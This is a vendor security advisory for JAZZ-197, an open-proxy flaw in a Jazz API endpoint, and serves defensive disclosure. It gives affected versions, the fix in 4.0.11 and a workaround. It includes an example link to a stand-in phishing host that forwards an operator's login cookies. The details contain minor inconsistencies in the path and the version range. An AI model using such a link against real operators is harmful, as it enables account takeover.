Release Date:

28th May, 2019

Overview:

The Jazz API endpoint /api/v1/infrastructure/services/ proxies to any HTTP location specified in the URL, potentially leaking login cookies to the proxied site.

Affected Products:

• Jazz on-premise installations since version 4.0.8 up to and including 4.0.10.

Unaffected Products:

• Jazz Cloud and any Jazz on-premise before 4.0.8 and after 4.0.11.

Resolution:

This issue is now been fixed in Jazz Infrastructure version 4.0.11.

It is strongly recommended that all on-premise installations running an affected version upgrade to the latest release as soon as possible. Releases are available to download through the support portal. Jazz Cloud customers are unaffected.

If it is not possible to upgrade, disable the access to this API endpoint by creating a role using the Jazz API via api/v1/roles and removing the permissions CAN_RESTART_SERVICES assigning this role to all operators via the LDAP configuration interface or the internal operators API.

Vulnerability Information:

JAZZ-197 allows the Jazz API endpoint /api/v1/infrastructure/services/ to proxy to any URL specified. If an authorized and authenticated Jazz operator clicks on a link of the form https://www.example.com/api/v1/infrastructure/service/phish.example.com:80 this will forward login cookies (and other HTTP headers) to phish.example.com. This could be used from the browser to compromise the operator's account.

• CVE: pending.
• CVSSv3 score: 8.8 (High).
• CVSSv3 vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H/E:H/RL:U/RC:C/MAV:N

Acknowledgments:

Issue found internally by Jazz Networks.

Disclosure Timeline:

• 20/05/2019 Issue found internally by Jazz.
• 20/05/2019 Root cause established.
• 20/05/2019 Fix identified.
• 28/05/2019 Patched Jazz Infrastructure released.
• 28/05/2019 Vulnerability publicly disclosed.